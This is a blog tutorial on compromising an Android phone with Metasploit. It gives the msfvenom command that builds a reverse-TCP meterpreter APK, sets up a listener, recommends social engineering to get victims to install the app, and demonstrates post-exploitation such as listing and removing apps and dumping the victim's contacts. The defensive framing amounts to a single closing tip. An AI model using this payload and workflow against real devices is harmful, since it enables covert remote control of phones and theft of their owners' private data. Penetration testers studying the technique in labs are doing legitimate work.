How to Hack an Android Phone Using Metasploit Msfvenom in Kali Linux

In this article, we are going to learn how to hack an Android phone using Metasploit framework. Android devices are growing very fast worldwide and actually using a lot of the core capabilities of Linux systems. That is why choosing Android is the best way to learn Mobile Penetration Testing.

We get requests from people on social channels asking; “how to hack an android phone”, so thought making a video tutorial on this. Here we are using Kali Linux to attack the target. The target has set to be an Android Phone and for that we are using an Android virtual machine. Of course, there are going to be some limitations and differences between a virtual Android and a physical Android device but for the purpose of learning pentesting it is recommended to conduct this test on a virtual device.

We will use msfvenom for creating a payload and save it as an apk file. After generating the payload, we need to setup a listener to Metasploit framework. Once the target downloads and installs the malicious apk then, an attacker can easily get back a meterpreter session on Metasploit. An attacker needs to do some social engineering to install apk on the victim’s mobile device.

Step by step Tutorial

Generating a Payload with msfvenom

At first, fire up the Kali Linux so that we may generate an apk file as a malicious payload. We need to check our local IP that turns out to be ‘’. You can also hack an Android device through Internet by using your Public/External IP in the LHOST and by port forwarding.

Generating a Payload with msfvenom

After getting your Local host IP use msfvenom tool that will generate a payload to penetrate the Android device. Type command:

# msfvenom –p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R> /var/www/html/ehacking.apk


  • -p indicates a payload type
  • android/metepreter/reverse_tcp specifies a reverse meterpreter shell would come in from a target Android device
  • LHOST is your local IP
  • LPORT is set to be as a listening port
  • R> /var/www/html would give the output directly on apache server
  • apk is the final name of the final output

This would take some time to generate an apk file of almost ten thousand bytes.


Launching an Attack

Before launching attack, we need to check the status of the apache server. Type command:

# service apache2 status

Launching an Attack

All seems set, now fire up msfconsole. Use multi/handler exploit, set payload the same as generated prevoisly, set LHOST and LPORT values same as used in payload and finally type exploit to launch an attack.


In real life scenarios, some social engineering techniques can be used to let the target download the malicious apk file. For demonstration we are just accessing the attacker machine to download the file in the Android device.

download the file in the Android device.

After downloading it successfully, select the app to install.

After downloading it successfully, select the app to install.

So far, this option has been seen frequently when we try to install some third-party apps and normally users wont hesitate to allow the installation from unknown sources.

the installation from unknown sources.Enable the settings to install applications from the third-party sources. And finally hit the install option at the bottom.

Enable the settings to install applications Once the user installs the application and runs it, the meterepreter session would be opened immediatly at the attacking side.

opened immediatly

Post Exploitation

Type “background” and then “sessions” to list down all the sessions from where you can see all the IPs connected to the machine.

Post Exploitation

You can interact with any session by typing sessions -i [session ID]

After entering the session, type “help” to list down all the commands we can put forward in this session.

You can see some file system commands that are helpful when you’re trying to go after some sensitive information or data. By using these, You can easily download or upload any file or information.

file system commandsYou will also find some network commands including portfwd and route


Some powerful system commands to get user ID, get a shell or getting the complete system information.

Type “app_list” and it will show you all the installed apps on the device

Type “app_list” and it will show you all the installed apps on the deviceWe also have the power to uninstall any app from the Android device

We also have the power to uninstall any app from the Android device

Extracting Contacts from an Android Device

Now let extract some contacts from the target device by typing “dump” and double tab

Extracting Contacts from an Android DeviceIt will show all the options to extract from the device. Type “dump_contacts” and enter

dump_contactsIt will extract all the contacts from the Android device and will save it in our local directory. To see this file type “ls” and “cat [file_name]”

This would show the content of the contact’s file earlier downloaded from the target device. This information is really sensitive and could be exploited by hackers.

There are lots of more commands available in meterpreter. Further try to explore and learn what we can perform with an Android device. This concludes that we have successfully penetrated the Android device using Kali Linux and Metasploit-Framework.

A healthy tip to secure your Android device is to not install any application from an unknown source, even if you really want to install it, try to read and examine its source code to get an idea whether this file is malicious or not.

So, I hope it answers the most common question, that is how to hack an android phone. See yea.

Irfan Shakeel
Irfan Shakeel, the founder of ehacking project, he also hosts cyber security training classes at EH Academy. He has discovered many vulnerabilities in the famous platforms (like Google, Dailymotion, Harvard University & etc.). He specializes in Network hacking, VoIP pentesting & digital forensics. He is the author of the book title “Hacking from Scratch”.

Most Popular

What Makes ICS/OT Infrastructure Vulnerable?

Infrastructure security for operational technologies (OT) and industrial control systems (ICS) varies from IT security in several ways, with the inverse confidentiality, integrity, and...

Everything You Must Know About IT/OT Convergence

What is an Operational Technology (OT)? Operational technology (OT) is a technology that primarily monitors and controls physical operations. It can automate and control machines,...

Understand the OT Security and Its Importance

This article discusses OT security and why it is essential for protecting industrial systems from cyberattacks. We will also discuss common control objectives that can...

What is Deepfake, and how does it Affect Cybersecurity?

Producing deepfake is easy. It is hard to detect. They operate with a description of reality rather than reality itself (e.g., a video). Any...